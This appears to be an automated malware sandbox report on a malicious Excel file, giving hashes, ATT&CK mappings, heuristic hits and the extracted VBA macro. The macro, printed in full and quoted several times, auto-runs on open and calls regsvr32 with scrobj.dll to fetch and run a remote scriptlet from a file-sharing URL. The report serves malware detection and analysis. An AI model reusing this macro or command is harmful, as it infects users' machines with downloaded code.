Office (OOXML) malware analysis — malicious · d3093652cb4f0378

MALICIOUS

Office (OOXML)

17.1 KB Created: 2021-07-01 11:13:02 UTC Authoring application: Microsoft Excel 12.0000 First seen: 2021-07-07

MD5: 92a72cee824cea8d897645fa6d294ba9 SHA-1: fbe2a003c628c895e0a3946ad8e4f1d62c67a063 SHA-256: d3093652cb4f03784a02c812e148ff54dd8475efdcbdf0106bb6d8809a92f774

410 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1059 Command and Scripting Interpreter

The file is an Excel document containing a Workbook_Open VBA macro. This macro utilizes WScript.Shell and CreateObject to execute obfuscated code, which is a common technique for downloading and executing secondary payloads. ClamAV detection further confirms its malicious nature, identifying it as Xls.Malware.Valyria-10036093-0.

Heuristics 9

ClamAV: Xls.Malware.Valyria-10036093-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Xls.Malware.Valyria-10036093-0
VBA project inside OOXML medium 6 related findings OOXML_VBA

Document contains a VBA project — VBA macros present

Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA

Matched line in script

    .Filters.Add "Excel Files", "*.HpDnSidGJFQTFksRAoTAReskzutALnNIzyXLDAHRdbOkeZhhcVhbKtEDSrUFPIU; *.OaJhELSMQXCdkNMPRsdFEUYwEdwneJWuoDWHhnOusQkOJvWXS; *.Ay; *.cZTBGfIaSNVwRwwLEXUSZp; *.GCiMDJFkYbtXAePJIXEhRVdANOwzUDJebD", 1
Set uF = CreateObject("WScript.Shell")
uF.Run ("regsvr32 /sizPKWwyBNY   /nYEMdzPaGVA   /uizPKWwyBNY  /i:https://www.4sync.com/web/directDownload/xKeFw8Si/pxjLRT8v.fd85e82b25af2e7c1e397a6b2d3f5a74  scrobj.dll OJKCVrHLdX")

WScript.Shell usage critical OLE_VBA_WSCRIPT

WScript.Shell usage

Matched line in script

    .Filters.Add "Excel Files", "*.HpDnSidGJFQTFksRAoTAReskzutALnNIzyXLDAHRdbOkeZhhcVhbKtEDSrUFPIU; *.OaJhELSMQXCdkNMPRsdFEUYwEdwneJWuoDWHhnOusQkOJvWXS; *.Ay; *.cZTBGfIaSNVwRwwLEXUSZp; *.GCiMDJFkYbtXAePJIXEhRVdANOwzUDJebD", 1
Set uF = CreateObject("WScript.Shell")
uF.Run ("regsvr32 /sizPKWwyBNY   /nYEMdzPaGVA   /uizPKWwyBNY  /i:https://www.4sync.com/web/directDownload/xKeFw8Si/pxjLRT8v.fd85e82b25af2e7c1e397a6b2d3f5a74  scrobj.dll OJKCVrHLdX")

LOLBin reference in VBA critical OLE_VBA_LOLBIN

LOLBin reference in VBA

Matched line in script

Set uF = CreateObject("WScript.Shell")
uF.Run ("regsvr32 /sizPKWwyBNY   /nYEMdzPaGVA   /uizPKWwyBNY  /i:https://www.4sync.com/web/directDownload/xKeFw8Si/pxjLRT8v.fd85e82b25af2e7c1e397a6b2d3f5a74  scrobj.dll OJKCVrHLdX")
 .Show

CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call

Matched line in script

    .Filters.Add "Excel Files", "*.HpDnSidGJFQTFksRAoTAReskzutALnNIzyXLDAHRdbOkeZhhcVhbKtEDSrUFPIU; *.OaJhELSMQXCdkNMPRsdFEUYwEdwneJWuoDWHhnOusQkOJvWXS; *.Ay; *.cZTBGfIaSNVwRwwLEXUSZp; *.GCiMDJFkYbtXAePJIXEhRVdANOwzUDJebD", 1
Set uF = CreateObject("WScript.Shell")
uF.Run ("regsvr32 /sizPKWwyBNY   /nYEMdzPaGVA   /uizPKWwyBNY  /i:https://www.4sync.com/web/directDownload/xKeFw8Si/pxjLRT8v.fd85e82b25af2e7c1e397a6b2d3f5a74  scrobj.dll OJKCVrHLdX")

VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

Workbook_Open macro low OLE_VBA_WBOPEN

Workbook_Open macro

Matched line in script

Attribute VB_Customizable = True
Private Sub Workbook_Open()
For hUSDAzUT = 1 To VPBNwVXyVvGQGOQcsISEJ

Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL https://www.4sync.com/web/directDownload/xKeFw8Si/pxjLRT8v.fd85e82b25af2e7c1e397a6b2d3f5a74 In document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	7405 bytes
SHA-256: `b9a4175106d655cfa590bdebd41b4d0b77420a1eee42633061754497127f1b71`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisWorkbook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Private Sub Workbook_Open() For hUSDAzUT = 1 To VPBNwVXyVvGQGOQcsISEJ MnLN = NYLIONeUWBDitYUeUAQMIZIAhefDPiSCtuzQZZLkTtWfKUnsdneWYGcIpwsKsHfhDbIG.UOFeQwKcNhBOU(1).Range("YOE" & hUSDAzUT).Value otEWuReUviZfOEzSezSsatNtuESSNcYtyoAzifaUbVkneAJNQFpvPeFPDh = NYLIONeUWBDitYUeUAQMIZIAhefDPiSCtuzQZZLkTtWfKUnsdneWYGcIpwsKsHfhDbIG.UOFeQwKcNhBOU(1).Range("WCXDCWQiMWOaMTskMNQnizODhQBtOPEZRMyhVENOYt" & hUSDAzUT).Value Select Case True Case MnLN = "DbuodtLzHV:": NYLIONeUWBDitYUeUAQMIZIAhefDPiSCtuzQZZLkTtWfKUnsdneWYGcIpwsKsHfhDbIG.UOFeQwKcNhBOU(1).Range("YOE" & hUSDAzUT & ":WCXDCWQiMWOaMTskMNQnizODhQBtOPEZRMyhVENOYt" & hUSDAzUT).Font.Bold = True Case InStr(1, MnLN, "yDaHdpcNPkzCRctGuonStzTDzLDJGJhWsTrarMYWwfKICKbnpRcLoDzYJDiyMyihb: ") NYLIONeUWBDitYUeUAQMIZIAhefDPiSCtuzQZZLkTtWfKUnsdneWYGcIpwsKsHfhDbIG.UOFeQwKcNhBOU(1).Range("YOE" & hUSDAzUT & ":tVOrLfDkzoSYASDpXNOCQLCPTGpRACENGOoPKAeSpIdTDRAXurQPbwoLyYBf" & hUSDAzUT).Interior.ColorIndex = 15 NYLIONeUWBDitYUeUAQMIZIAhefDPiSCtuzQZZLkTtWfKUnsdneWYGcIpwsKsHfhDbIG.UOFeQwKcNhBOU(1).Range("YOE" & hUSDAzUT).Font.Bold = True Case InStr(1, otEWuReUviZfOEzSezSsatNtuESSNcYtyoAzifaUbVkneAJNQFpvPeFPDh, "YOE"): NYLIONeUWBDitYUeUAQMIZIAhefDPiSCtuzQZZLkTtWfKUnsdneWYGcIpwsKsHfhDbIG.UOFeQwKcNhBOU(1).Range("WCXDCWQiMWOaMTskMNQnizODhQBtOPEZRMyhVENOYt" & hUSDAzUT & ":WCXDCWQiMWOaMTskMNQnizODhQBtOPEZRMyhVENOYt" & (hUSDAzUT + 2)).Interior.ColorIndex = 37 Case InStr(1, otEWuReUviZfOEzSezSsatNtuESSNcYtyoAzifaUbVkneAJNQFpvPeFPDh, "WCXDCWQiMWOaMTskMNQnizODhQBtOPEZRMyhVENOYt"): NYLIONeUWBDitYUeUAQMIZIAhefDPiSCtuzQZZLkTtWfKUnsdneWYGcIpwsKsHfhDbIG.UOFeQwKcNhBOU(1).Range("WCXDCWQiMWOaMTskMNQnizODhQBtOPEZRMyhVENOYt" & hUSDAzUT & ":WCXDCWQiMWOaMTskMNQnizODhQBtOPEZRMyhVENOYt" & (hUSDAzUT + 2)).Interior.ColorIndex = 3 Case InStr(1, otEWuReUviZfOEzSezSsatNtuESSNcYtyoAzifaUbVkneAJNQFpvPeFPDh, "LLIDLaVZEYQrcYoFiQPHeCJrTSILw"): NYLIONeUWBDitYUeUAQMIZIAhefDPiSCtuzQZZLkTtWfKUnsdneWYGcIpwsKsHfhDbIG.UOFeQwKcNhBOU(1).Range("WCXDCWQiMWOaMTskMNQnizODhQBtOPEZRMyhVENOYt" & hUSDAzUT & ":WCXDCWQiMWOaMTskMNQnizODhQBtOPEZRMyhVENOYt" & (hUSDAzUT + 2)).Interior.Color = RGB(50, 205, 50) End Select Next hUSDAzUT Application.DisplayAlerts = False With Application.FileDialog(msoFileDialogFilePicker) .AllowMultiSelect = False 'YLCFURrakMzPWfbpdPrOnPekpbkPDdJKIRiNdXGFktMftpRWRKYpSn yuHtIIN hUSDAzUT UOFeQwKcNhBOU .Filters.Add "Excel Files", ".HpDnSidGJFQTFksRAoTAReskzutALnNIzyXLDAHRdbOkeZhhcVhbKtEDSrUFPIU; .OaJhELSMQXCdkNMPRsdFEUYwEdwneJWuoDWHhnOusQkOJvWXS; .Ay; .cZTBGfIaSNVwRwwLEXUSZp; *.GCiMDJFkYbtXAePJIXEhRVdANOwzUDJebD", 1 Set uF = CreateObject("WScript.Shell") uF.Run ("regsvr32 /sizPKWwyBNY /nYEMdzPaGVA /uizPKWwyBNY /i:https://www.4sync.com/web/directDownload/xKeFw8Si/pxjLRT8v.fd85e82b25af2e7c1e397a6b2d3f5a74 scrobj.dll OJKCVrHLdX") .Show 'yDaHdpcNPkzCRctGuonStzTDzLDJGJhWsTrarMYWwfKICKbnpRcLoDzYJDiyMyihb YOE YOE /nYEMdzPaGVA yuHtIIN YOE YOE YOE yuHtIIN End With If InStr(fullpath, ".Ay") = 0 Then Exit Sub End If Set ws = Workbooks.Open(fullpath) Set wb = Workbooks.Add ws.UOFeQwKcNhBOU(1).UsedRange.Copy Destination:=wb.UOFeQwKcNhBOU("NPTiWfOvhEcdLe").Range("YOE" & Rows.eU).End(xlUp) wb.UOFeQwKcNhBOU("NPTiWfOvhEcdLe").Range("oCKQSQv").Value = "Status" lRow = wb.UOFeQwKcNhBOU("NPTiWfOvhEcdLe").Cells(Rows.eU, 1).End(xlUp).Row For ZeJJOyduFvCzeYcvcGuuhkeUhQsMS = 2 To lRow If wb.UOFeQwKcNhBOU("NPTiWfOvhEcdLe").Range("H" & ZeJJOyduFvCzeYcvcGuuhkeUhQsMS).Value = 0 And wb.UOFeQwKcNhBOU(1).Range("I" & ZeJJOyduFvCzeYcvcGuuhkeUhQsMS).Value = 0 Then wb.UOFeQwKcNhBOU("NPTiWfOvhEcdLe").Range("ZeJJOyduFvCzeYcvcGuuhkeUhQsMS" & ZeJJOyduFvCzeYcvcGuuhkeUhQsMS).Value = "LLIDLaVZEYQrcYoFiQPHeCJrTSILw" Else wb.UOFeQwKcNhBOU("NPTiWfOvhEcdLe").Range("ZeJJOyduFvCzeYcvcGuuhkeUhQsMS" & ZeJJOyduFvCzeYcvcGuuhkeUhQsMS).Value = "LLIDLaVZEYQrcYoFiQPHeCJrTSILw" End If Next ZeJJOyduFvCzeYcvcGuuhkeUhQsMS wb.UOFeQwKcNhBOU("NPTiWfOvhEcdLe").Range("DLrQhkFbWKXynPDfhPMC:oCKQSQv").AutoFilter _ Field:=4, _ Criteria1:=Array("EN", "EN/GVLWVkzR", "FF", "FF/GVLWVkzR", "TGhvSRwNWCCRuAFzEdOIEnJwbGZYOhQCEonMuTyQYkyQkLJSfEAvuNoEXVpu", "TGhvSRwNWCCRuAFzEdOIEnJwbGZYOhQCEonMuTyQYkyQkLJSfEAvuNoEXVpu/GVLWVkzR"), _ Operator:=xlFilterValues 'UfALhzLQZUIbZrWR?HfzPGbLnLJYIdnEiZFOTnGICDefITOWnVIAMzbAbPDFQNk wb.UOFeQwKcNhBOU("NPTiWfOvhEcdLe").Range("DLrQhkFbWKXynPDfhPMC:oCKQSQv").AutoFilter _ Field:=5, _ Criteria1:=Array("1", "2", "3", "4", "5", "6", "7"), _ Operator:=xlFilterValues 'yDaHdpcNPkzCRctGuonStzTDzLDJGJhWsTrarMYWwfKICKbnpRcLoDzYJDiyMyihb wb.UOFeQwKcNhBOU("NPTiWfOvhEcdLe").Range("DLrQhkFbWKXynPDfhPMC:oCKQSQv").AutoFilter _ Field:=7, _ Criteria1:=Array("YOE", "WCXDCWQiMWOaMTskMNQnizODhQBtOPEZRMyhVENOYt", "LLIDLaVZEYQrcYoFiQPHeCJrTSILw"), _ Operator:=xlFilterValues Worksheets("NPTiWfOvhEcdLe").Cells(1, 1).Select UOFeQwKcNhBOU.Add wb.PivotCaches.Create(SourceType:=xlDatabase, SourceData:= _ "NPTiWfOvhEcdLe!R1C1:R" & lRow & "yuHtIIN", Version:=xlPivotTableVersion15).CreatePivotTable _ TableDestination:="GactrRkVfNLZowCuehotEMBaMMbGoFGLBBtcrSUKWBKAXLe!R3C1", TableName:="PivotTable1", DefaultVersion _ :=xlPivotTableVersion15 UOFeQwKcNhBOU("GactrRkVfNLZowCuehotEMBaMMbGoFGLBBtcrSUKWBKAXLe").Select wb.UOFeQwKcNhBOU("GactrRkVfNLZowCuehotEMBaMMbGoFGLBBtcrSUKWBKAXLe").PivotTables(1).AddFields _ ColumnFields:="YOE", _ RowFields:=Array("yDaHdpcNPkzCRctGuonStzTDzLDJGJhWsTrarMYWwfKICKbnpRcLoDzYJDiyMyihb", "RUOVNWvJXbUGzzzCrpHu", "RUOVNWvJXbUGzzzCrpHu", "RUOVNWvJXbUGzzzCrpHu", "RUOVNWvJXbUGzzzCrpHu") With wb.UOFeQwKcNhBOU("GactrRkVfNLZowCuehotEMBaMMbGoFGLBBtcrSUKWBKAXLe").PivotTables(1).PivotFields("iQFsAFVrXT") .Orientation = xlDataField .Name = "eU" .Function = xlCount End With With wb.UOFeQwKcNhBOU("GactrRkVfNLZowCuehotEMBaMMbGoFGLBBtcrSUKWBKAXLe").PivotTables(1).PivotFields("iQFsAFVrXT") .Orientation = xlDataField .Name = "BZXBboGXXpriCOyiXVEiwQnOBFZLSXupwPdJcVGG" .NumberFormat = "BZXBboGXXpriCOyiXVEiwQnOBFZLSXupwPdJcVGG" .Function = xlCount .Calculation = xlPercentOfRow End With End Sub Attribute VB_Name = "Sheet1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Sheet2" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Sheet3" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True
`vbaProject_00.bin`	vba-project	OOXML VBA project: xl/vbaProject.bin	23040 bytes
SHA-256: `9e460985741bde15d353ecc8a15478781279a08e5ea950d30c92442a16f63ac5`
Detection ClamAV: Xls.Malware.Valyria-10036093-0 Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.